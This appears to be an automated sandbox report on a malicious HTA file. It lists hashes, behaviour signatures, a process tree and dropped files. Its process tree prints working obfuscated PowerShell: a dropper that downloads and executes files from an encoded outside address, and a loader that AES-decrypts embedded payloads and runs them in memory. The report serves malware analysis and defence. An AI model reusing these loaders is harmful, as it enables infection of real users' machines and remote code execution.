Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    17-04-2024 01:33

General

  • Target

    609d44617a0a2884204f59d1350ffa87cef6be04d06c42014957515a6fb12f61.hta

  • Size

    12KB

  • MD5

    a76519720925437e61593d697c22d2c3

  • SHA1

    fd9e658d262708c746854082d8a00e9ff998ff95

  • SHA256

    609d44617a0a2884204f59d1350ffa87cef6be04d06c42014957515a6fb12f61

  • SHA512

    8be920887fde3b309df0740568840254230990a0d26ae09340a37beafccaebe5b74f9feb776d0cfbcac13b40591892319d4bf2756cbb64d66e187b7483e9a71d

  • SSDEEP

    384:OSJ6w3wSSkOLjX30OxjnPC/0OOjHhw/SFfJ+RATJcJ/A4B4/JdNOJitAJ8tluNVe:OSJxgSoLjX3NxjnPC/NOjHhw/S9J+RAL

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\609d44617a0a2884204f59d1350ffa87cef6be04d06c42014957515a6fb12f61.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2984
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function tNWGEJMu($ULFEPiGhOl, $hAwOwjHZ){[IO.File]::WriteAllBytes($ULFEPiGhOl, $hAwOwjHZ)};function PGKDesLMcrTbG($ULFEPiGhOl){if($ULFEPiGhOl.EndsWith((nknmvKToK @(69280,69334,69342,69342))) -eq $True){rundll32.exe $ULFEPiGhOl }elseif($ULFEPiGhOl.EndsWith((nknmvKToK @(69280,69346,69349,69283))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ULFEPiGhOl}elseif($ULFEPiGhOl.EndsWith((nknmvKToK @(69280,69343,69349,69339))) -eq $True){misexec /qn /i $ULFEPiGhOl}else{Start-Process $ULFEPiGhOl}};function oUMxzMjfRmyfuF($kRhMsCFPNneuPI){$bAYnlERprgsydxZhcb = New-Object (nknmvKToK @(69312,69335,69350,69280,69321,69335,69332,69301,69342,69339,69335,69344,69350));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hAwOwjHZ = $bAYnlERprgsydxZhcb.DownloadData($kRhMsCFPNneuPI);return $hAwOwjHZ};function nknmvKToK($seDVN){$yalEZGZTFwbDQOL=69234;$tpnuZBTtZIpg=$Null;foreach($KCBlEGmaNzzs in $seDVN){$tpnuZBTtZIpg+=[char]($KCBlEGmaNzzs-$yalEZGZTFwbDQOL)};return $tpnuZBTtZIpg};function jSMnCBtJT(){$RhDqJvMegLwjZOQ = $env:AppData + '\';$rQGmlBDswBs = $RhDqJvMegLwjZOQ + 'dbx.xlsx';If(Test-Path -Path $rQGmlBDswBs){Invoke-Item $rQGmlBDswBs;}Else{ $NvyoXyonhCMUvEQanD = oUMxzMjfRmyfuF (nknmvKToK @(69338,69350,69350,69346,69292,69281,69281,69283,69291,69286,69280,69286,69290,69280,69284,69287,69283,69280,69283,69288,69291,69292,69289,69284,69290,69289,69281,69334,69332,69354,69280,69354,69342,69349,69354));tNWGEJMu $rQGmlBDswBs $NvyoXyonhCMUvEQanD;Invoke-Item $rQGmlBDswBs;};$vILiVqGF = $RhDqJvMegLwjZOQ + 'gogis.bat'; if (Test-Path -Path $vILiVqGF){PGKDesLMcrTbG $vILiVqGF;}Else{ $TIaEiamfAp = oUMxzMjfRmyfuF (nknmvKToK @(69338,69350,69350,69346,69292,69281,69281,69283,69291,69286,69280,69286,69290,69280,69284,69287,69283,69280,69283,69288,69291,69292,69289,69284,69290,69289,69281,69337,69345,69337,69339,69349,69280,69332,69331,69350));tNWGEJMu $vILiVqGF $TIaEiamfAp;PGKDesLMcrTbG $vILiVqGF;};;;;}jSMnCBtJT;
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2668
      • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
        "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
        3⤵
        • Enumerates system info in registry
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        PID:2796
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Roaming\gogis.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2728
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\gogis.bat"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2748
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\gogis.bat';$XgWC='CJCPqopJCPqyToJCPq'.Replace('JCPq', ''),'DeKEVccoKEVcmKEVcpKEVcreKEVcsKEVcsKEVc'.Replace('KEVc', ''),'GeAJwHtCAJwHurrAJwHeAJwHntAJwHProAJwHceAJwHssAJwH'.Replace('AJwH', ''),'CGqtVreGqtVateGqtVDGqtVecrGqtVypGqtVtoGqtVrGqtV'.Replace('GqtV', ''),'TrashffnsfshfforshffmshffFinshffashfflBlshffocshffkshff'.Replace('shff', ''),'LoaAcuudAcuu'.Replace('Acuu', ''),'EnPhDKtPhDKrPhDKyPoPhDKiPhDKntPhDK'.Replace('PhDK', ''),'InvjPegokejPeg'.Replace('jPeg', ''),'ChBNFcangBNFceEBNFcxtBNFcenBNFcsBNFciBNFconBNFc'.Replace('BNFc', ''),'MamJZeimJZenmJZeMomJZedumJZelemJZe'.Replace('mJZe', ''),'SDiPVplDiPViDiPVtDiPV'.Replace('DiPV', ''),'ReZkbLadLZkbLinZkbLeZkbLsZkbL'.Replace('ZkbL', ''),'FBIJjrBIJjomBBIJjaBIJjseBIJj64BIJjStrBIJjiBIJjngBIJj'.Replace('BIJj', ''),'EleFaTTmeFaTTnFaTTtAFaTTtFaTT'.Replace('FaTT', '');powershell -w hidden;function nHhmY($bfNRC){$Wqjzg=[System.Security.Cryptography.Aes]::Create();$Wqjzg.Mode=[System.Security.Cryptography.CipherMode]::CBC;$Wqjzg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Wqjzg.Key=[System.Convert]::($XgWC[12])('0/mNfjofNmhTDWKM5pVXBX9kZTvZAJfnb+xHxm0CsMs=');$Wqjzg.IV=[System.Convert]::($XgWC[12])('mimfsJsCvsdSCjq6OJjGsw==');$mEsqN=$Wqjzg.($XgWC[3])();$cIvUt=$mEsqN.($XgWC[4])($bfNRC,0,$bfNRC.Length);$mEsqN.Dispose();$Wqjzg.Dispose();$cIvUt;}function Jxpsl($bfNRC){$DhsxW=New-Object System.IO.MemoryStream(,$bfNRC);$abuYQ=New-Object System.IO.MemoryStream;$hMgwC=New-Object System.IO.Compression.GZipStream($DhsxW,[IO.Compression.CompressionMode]::($XgWC[1]));$hMgwC.($XgWC[0])($abuYQ);$hMgwC.Dispose();$DhsxW.Dispose();$abuYQ.Dispose();$abuYQ.ToArray();}$vXkJe=[System.IO.File]::($XgWC[11])([Console]::Title);$JakZo=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 5).Substring(2))));$GFnOO=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 6).Substring(2))));[System.Reflection.Assembly]::($XgWC[5])([byte[]]$GFnOO).($XgWC[6]).($XgWC[7])($null,$null);[System.Reflection.Assembly]::($XgWC[5])([byte[]]$JakZo).($XgWC[6]).($XgWC[7])($null,$null); "
            5⤵
              PID:1344
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1216

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      be71a7edabbae792c25dae4c11077bef

      SHA1

      d396477f0410608f0fbcee9b80354770a6db318c

      SHA256

      8c0ca0b14f3e2b661020fd9a50fcfa4f7118152aa7f56b5f2dca5fc1cffc100e

      SHA512

      69f41f99377c397008041f0ebe19688904813d67170ae58a02e14514f1725076f81557ee79c2f396e9eaaebaa250f17cf823b93f8a76c53243c7c84f0b64aff1

    • C:\Users\Admin\AppData\Roaming\dbx.xlsx

      Filesize

      10KB

      MD5

      034b9d3741bf082520555ec8b45fa875

      SHA1

      b61bbd3d22e803cf608e1ae7e0a5a5851934db49

      SHA256

      82bcb0ad710775944bd5d4702595abde2557a84d518d146d389ba58cc1dfcd11

      SHA512

      8f721ff1f69eb0881a43bbb540e8adfac8bf94509038e4b5d27282457b426902586e561528329918a12d42bf5b98c4b8f17b676090508a18898ceb6f12cd4eb9

    • C:\Users\Admin\AppData\Roaming\gogis.bat

      Filesize

      6.9MB

      MD5

      a65e873839228c5b453d6effa5d14d16

      SHA1

      40be429e0e6b41061f3291d10e720eaebf32eda1

      SHA256

      59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951

      SHA512

      84ec1da7d5f5fe236c7fbe960b69d99ae0b6d3fe83844cd2bf3128508d39ad1de35f17dcb101e06fb25b155a806885bb5d6d095fbf3e0a3c729c678fa200f850

    • memory/1216-48-0x0000000072610000-0x0000000072BBB000-memory.dmp

      Filesize

      5.7MB

    • memory/1216-49-0x0000000002870000-0x00000000028B0000-memory.dmp

      Filesize

      256KB

    • memory/1216-50-0x0000000002870000-0x00000000028B0000-memory.dmp

      Filesize

      256KB

    • memory/1216-36-0x0000000072610000-0x0000000072BBB000-memory.dmp

      Filesize

      5.7MB

    • memory/1216-37-0x0000000002870000-0x00000000028B0000-memory.dmp

      Filesize

      256KB

    • memory/1216-35-0x0000000002870000-0x00000000028B0000-memory.dmp

      Filesize

      256KB

    • memory/1216-34-0x0000000072610000-0x0000000072BBB000-memory.dmp

      Filesize

      5.7MB

    • memory/2668-2-0x0000000072610000-0x0000000072BBB000-memory.dmp

      Filesize

      5.7MB

    • memory/2668-28-0x0000000072610000-0x0000000072BBB000-memory.dmp

      Filesize

      5.7MB

    • memory/2668-4-0x0000000072610000-0x0000000072BBB000-memory.dmp

      Filesize

      5.7MB

    • memory/2668-5-0x0000000002570000-0x00000000025B0000-memory.dmp

      Filesize

      256KB

    • memory/2668-3-0x0000000002570000-0x00000000025B0000-memory.dmp

      Filesize

      256KB

    • memory/2796-47-0x000000006D5ED000-0x000000006D5F8000-memory.dmp

      Filesize

      44KB

    • memory/2796-7-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2796-8-0x000000006D5ED000-0x000000006D5F8000-memory.dmp

      Filesize

      44KB

    • memory/2796-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2796-55-0x000000006D5ED000-0x000000006D5F8000-memory.dmp

      Filesize

      44KB